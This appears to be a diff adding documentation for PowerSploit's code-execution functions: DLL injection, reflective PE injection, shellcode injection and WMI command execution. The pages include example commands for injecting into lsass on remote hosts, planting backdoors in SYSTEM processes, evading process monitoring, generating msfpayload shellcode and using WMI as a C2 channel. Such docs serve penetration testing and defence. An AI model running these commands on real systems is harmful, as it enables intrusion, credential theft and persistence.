Inject 'evil.dll' into process ID 4274.
## PARAMETERS
### -ProcessID
Process ID of the process you want to inject a Dll into.
```yaml
Type: Int32
Parameter Sets: (All)
Aliases:
Required: True
Position: 1
Default value: 0
Accept pipeline input: False
Accept wildcard characters: False
```
### -Dll
Name of the dll to inject.
This can be an absolute or relative path.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: True
Position: 2
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
## NOTES
Use the '-Verbose' option to print detailed information.
## RELATED LINKS
[http://www.exploit-monday.com](http://www.exploit-monday.com)

300
docs/CodeExecution/Invoke-ReflectivePEInjection.md Executable file
View File

@ -0,0 +1,300 @@
# Invoke-ReflectivePEInjection
## SYNOPSIS
This script has two modes.
It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process.
These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.
1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.
Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process.
This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system,
this will load and execute the DLL/EXE in to memory without writing any files to disk.
2.) Reflectively load a DLL in to memory of a remote process.
As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process.
This is probably most useful for injecting backdoors in SYSTEM processes in Session0.
Currently, you cannot retrieve output
from the DLL.
The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the
remote process.
PowerSploit Function: Invoke-ReflectivePEInjection
Author: Joe Bialek, Twitter: @JosephBialek
Code review and modifications: Matt Graeber, Twitter: @mattifestation
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
## SYNTAX
```
Invoke-ReflectivePEInjection [-PEBytes] <Byte[]> [[-ComputerName] <String[]>] [[-FuncReturnType] <String>]
[[-ExeArgs] <String>] [[-ProcId] <Int32>] [[-ProcName] <String>] [-ForceASLR] [-DoNotZeroMZ]
```
## DESCRIPTION
Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc().
```
$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL.dll')
Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local
### -------------------------- EXAMPLE 2 --------------------------
```
Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print
```
the wchar_t* returned by WStringFunc() from all the computers.
$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL.dll')
Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)
### -------------------------- EXAMPLE 3 --------------------------
```
Load DemoEXE and run it locally.
```
$PEBytes = \[IO.File\]::ReadAllBytes('DemoEXE.exe')
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
### -------------------------- EXAMPLE 4 --------------------------
```
Load DemoEXE and run it locally. Forces ASLR on for the EXE.
```
$PEBytes = \[IO.File\]::ReadAllBytes('DemoEXE.exe')
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR
### -------------------------- EXAMPLE 5 --------------------------
```
Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.
```
$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL_RemoteProcess.dll')
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local
## PARAMETERS
### -PEBytes
A byte array containing a DLL/EXE to load and execute.
```yaml
Type: Byte[]
Parameter Sets: (All)
Aliases:
Required: True
Position: 1
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -ComputerName
Optional, an array of computernames to run the script on.
```yaml
Type: String[]
Parameter Sets: (All)
Aliases:
Required: False
Position: 2
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -FuncReturnType
Optional, the return type of the function being called in the DLL.
Default: Void
Options: String, WString, Void.
See notes for more information.
IMPORTANT: For DLLs being loaded remotely, only Void is supported.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 3
Default value: Void
Accept pipeline input: False
Accept wildcard characters: False
```
### -ExeArgs
Optional, arguments to pass to the executable being reflectively loaded.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 4
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -ProcId
Optional, the process ID of the remote process to inject the DLL in to.
If not injecting in to remote process, ignore this.
```yaml
Type: Int32
Parameter Sets: (All)
Aliases:
Required: False
Position: 5
Default value: 0
Accept pipeline input: False
Accept wildcard characters: False
```
### -ProcName
Optional, the name of the remote process to inject the DLL in to.
If not injecting in to remote process, ignore this.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 6
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -ForceASLR
Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR.
Some PE's will work with ASLR even
if the compiler flags don't indicate they support it.
Other PE's will simply crash.
Make sure to test this prior to using.
Has no effect when
loading in to a remote process.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -DoNotZeroMZ
Optional, will not wipe the MZ from the first two bytes of the PE.
This is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
## NOTES
GENERAL NOTES:
The script has 3 basic sets of functionality:
1.) Reflectively load a DLL in to the PowerShell process
-Can return DLL output to user when run remotely or locally.
-Cleans up memory in the PS process once the DLL finishes executing.
-Great for running pentest tools on remote computers without triggering process monitoring alerts.
-By default, takes 3 function names, see below (DLL LOADING NOTES) for more info.
2.) Reflectively load an EXE in to the PowerShell process.
-Can NOT return EXE output to user when run remotely.
If remote output is needed, you must use a DLL.
CAN return EXE output if run locally.
-Cleans up memory in the PS process once the DLL finishes executing.
-Great for running existing pentest tools which are EXE's without triggering process monitoring alerts.
3.) Reflectively inject a DLL in to a remote process.
-Can NOT return DLL output to the user when run remotely OR locally.
-Does NOT clean up memory in the remote process if/when DLL finishes execution.
-Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory.
-Expects the DLL to have this function: void VoidFunc().
This is the function that will be called after the DLL is loaded.
DLL LOADING NOTES:
PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output.
If you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL
return a char* or wchar_t*, which PowerShell can take and read the output from.
Anything output from stdout which is run using powershell
remoting will not be returned to you.
If you just run the PowerShell script locally, you WILL be able to see the stdout output from
applications because it will just appear in the console window.
The limitation only applies when using PowerShell remoting.
For DLL Loading:
Once this script loads the DLL, it calls a function in the DLL.
There is a section near the bottom labeled "YOUR CODE GOES HERE"
I recommend your DLL take no parameters.
I have prewritten code to handle functions which take no parameters are return
the following types: char*, wchar_t*, and void.
If the function returns char* or wchar_t* the script will output the
returned data.
The FuncReturnType parameter can be used to specify which return type to use.
The mapping is as follows:
wchar_t* : FuncReturnType = WString
char* : FuncReturnType = String
void : Default, don't supply a FuncReturnType
For the whcar_t* and char_t* options to work, you must allocate the string to the heap.
Don't simply convert a string
using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns.
The function name expected in the DLL for the prewritten FuncReturnType's is as follows:
WString : WStringFunc
String : StringFunc
Void : VoidFunc
These function names ARE case sensitive.
To create an exported DLL function for the wstring type, the function would
be declared as follows:
extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify
this script to accomodate this.
You can find the code to modify in the section labeled "YOUR CODE GOES HERE".
Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection
## RELATED LINKS
[http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/](http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/)

116
docs/CodeExecution/Invoke-Shellcode.md Executable file
View File

@ -0,0 +1,116 @@
# Invoke-Shellcode
## SYNOPSIS
Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
PowerSploit Function: Invoke-Shellcode
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
## SYNTAX
```
Invoke-Shellcode [-ProcessID <UInt16>] [-Shellcode <Byte[]>] [-Force]
```
## DESCRIPTION
Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre
PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX.
To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):
msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/\[";\]//g;s/\\\\/,0/g' | tr -d '\n' | cut -c2-
Make sure to specify 'thread' for your exit process.
Also, don't bother encoding your shellcode.
It's entirely unnecessary.
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Invoke-Shellcode -ProcessId 4274
```
Description
-----------
Inject shellcode into process ID 4274.
### -------------------------- EXAMPLE 2 --------------------------
```
Invoke-Shellcode
```
Description
-----------
Inject shellcode into the running instance of PowerShell.
### -------------------------- EXAMPLE 3 --------------------------
```
Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)
```
Description
-----------
Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)
Warning: This script has no way to validate that your shellcode is 32 vs.
64-bit!
## PARAMETERS
### -ProcessID
Process ID of the process you want to inject shellcode into.
```yaml
Type: UInt16
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: 0
Accept pipeline input: False
Accept wildcard characters: False
```
### -Shellcode
Specifies an optional shellcode passed in as a byte array
```yaml
Type: Byte[]
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Force
Injects shellcode without prompting for confirmation.
By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
## NOTES
## RELATED LINKS

311
docs/CodeExecution/Invoke-WmiCommand.md Executable file
View File

@ -0,0 +1,311 @@
# Invoke-WmiCommand
## SYNOPSIS
Executes a PowerShell ScriptBlock on a target computer using WMI as a
pure C2 channel.
Author: Matthew Graeber
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
## SYNTAX
```
Invoke-WmiCommand [-Payload] <ScriptBlock> [[-RegistryHive] <String>] [[-RegistryKeyPath] <String>]
[[-RegistryPayloadValueName] <String>] [[-RegistryResultValueName] <String>] [[-ComputerName] <String[]>]
[[-Credential] <PSCredential>] [[-Impersonation] <ImpersonationLevel>]
[[-Authentication] <AuthenticationLevel>] [-EnableAllPrivileges] [[-Authority] <String>]
```
## DESCRIPTION
Invoke-WmiCommand executes a PowerShell ScriptBlock on a target
computer using WMI as a pure C2 channel.
It does this by using the
StdRegProv WMI registry provider methods to store a payload into a
registry value.
The command is then executed on the victim system and
the output is stored in another registry value that is then retrieved
remotely.
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1'
```
### -------------------------- EXAMPLE 2 --------------------------
```
$Hosts = Get-Content hostnames.txt
```
PS C:\\\>$Payload = Get-Content payload.ps1
PS C:\\\>$Credential = Get-Credential 'TargetDomain\TargetUser'
PS C:\\\>$Hosts | Invoke-WmiCommand -Payload $Payload -Credential $Credential
### -------------------------- EXAMPLE 3 --------------------------
```
$Payload = Get-Content payload.ps1
```
PS C:\\\>Invoke-WmiCommand -Payload $Payload -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1', '10.10.1.2'
### -------------------------- EXAMPLE 4 --------------------------
```
Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential 'TargetHost\Administrator' -Verbose
```
## PARAMETERS
### -Payload
Specifies the payload to be executed on the remote system.
```yaml
Type: ScriptBlock
Parameter Sets: (All)
Aliases:
Required: True
Position: 1
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -RegistryHive
{{Fill RegistryHive Description}}
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 2
Default value: HKEY_CURRENT_USER
Accept pipeline input: False
Accept wildcard characters: False
```
### -RegistryKeyPath
Specifies the registry key where the payload and payload output will
be stored.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 3
Default value: SOFTWARE\Microsoft\Cryptography\RNG
Accept pipeline input: False
Accept wildcard characters: False
```
### -RegistryPayloadValueName
Specifies the registry value name where the payload will be stored.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 4
Default value: Seed
Accept pipeline input: False
Accept wildcard characters: False
```
### -RegistryResultValueName
Specifies the registry value name where the payload output will be
stored.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 5
Default value: Value
Accept pipeline input: False
Accept wildcard characters: False
```
### -ComputerName
Runs the command on the specified computers.
The default is the local
computer.
Type the NetBIOS name, an IP address, or a fully qualified domain
name of one or more computers.
To specify the local computer, type
the computer name, a dot (.), or "localhost".
This parameter does not rely on Windows PowerShell remoting.
You can
use the ComputerName parameter even if your computer is not
configured to run remote commands.
```yaml
Type: String[]
Parameter Sets: (All)
Aliases: Cn
Required: False
Position: 6
Default value: Localhost
Accept pipeline input: True (ByValue)
Accept wildcard characters: False
```
### -Credential
Specifies a user account that has permission to perform this action.
The default is the current user.
Type a user name, such as "User01",
"Domain01\User01", or User@Contoso.com.
Or, enter a PSCredential
object, such as an object that is returned by the Get-Credential
cmdlet.
When you type a user name, you will be prompted for a
password.
```yaml
Type: PSCredential
Parameter Sets: (All)
Aliases:
Required: False
Position: 7
Default value: [Management.Automation.PSCredential]::Empty
Accept pipeline input: False
Accept wildcard characters: False
```
### -Impersonation
Specifies the impersonation level to use.
Valid values are:
0: Default (Reads the local registry for the default impersonation level, which is usually set to "3: Impersonate".)
1: Anonymous (Hides the credentials of the caller.)
2: Identify (Allows objects to query the credentials of the caller.)
3: Impersonate (Allows objects to use the credentials of the caller.)
4: Delegate (Allows objects to permit other objects to use the credentials of the caller.)
```yaml
Type: ImpersonationLevel
Parameter Sets: (All)
Aliases:
Accepted values: Default, Anonymous, Identify, Impersonate, Delegate
Required: False
Position: 8
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Authentication
Specifies the authentication level to be used with the WMI connection.
Valid values are:
-1: Unchanged
0: Default
1: None (No authentication in performed.)
2: Connect (Authentication is performed only when the client establishes a relationship with the application.)
3: Call (Authentication is performed only at the beginning of each call when the application receives the request.)
4: Packet (Authentication is performed on all the data that is received from the client.)
5: PacketIntegrity (All the data that is transferred between the client and the application is authenticated and verified.)
6: PacketPrivacy (The properties of the other authentication levels are used, and all the data is encrypted.)
```yaml
Type: AuthenticationLevel
Parameter Sets: (All)
Aliases:
Accepted values: Default, None, Connect, Call, Packet, PacketIntegrity, PacketPrivacy, Unchanged
Required: False
Position: 9
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -EnableAllPrivileges
Enables all the privileges of the current user before the command
makes the WMI call.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -Authority
Specifies the authority to use to authenticate the WMI connection.
You can specify standard NTLM or Kerberos authentication.
To use
NTLM, set the authority setting to ntlmdomain:\<DomainName\>, where
\<DomainName\> identifies a valid NTLM domain name.
To use Kerberos,
specify kerberos:\<DomainName\ServerName\>.
You cannot include the
authority setting when you connect to the local computer.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 10
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
### System.String[]
Accepts one or more host names/IP addresses over the pipeline.
## OUTPUTS
### System.Management.Automation.PSObject
Outputs a custom object consisting of the target computer name and
the output of the command executed.
## NOTES
In order to receive the output from your payload, it must return
actual objects.
For example, Write-Host doesn't return objects
rather, it writes directly to the console.
If you're using
Write-Host in your scripts though, you probably don't deserve to get
the output of your payload back.
:P
## RELATED LINKS

6
mkdocs.yml
View File

@ -122,3 +122,9 @@ pages:
- AntiVirus: - AntiVirus:
- Functions: - Functions:
- Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md' - Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md'
- CodeExecution:
- Functions:
- Find-AVSignature: 'CodeExecution/Invoke-DllInjection.md'
- Find-AVSignature: 'CodeExecution/Invoke-ReflectivePEInjection.md'
- Find-AVSignature: 'CodeExecution/Invoke-Shellcode.md'
- Find-AVSignature: 'CodeExecution/Invoke-WmiCommand.md'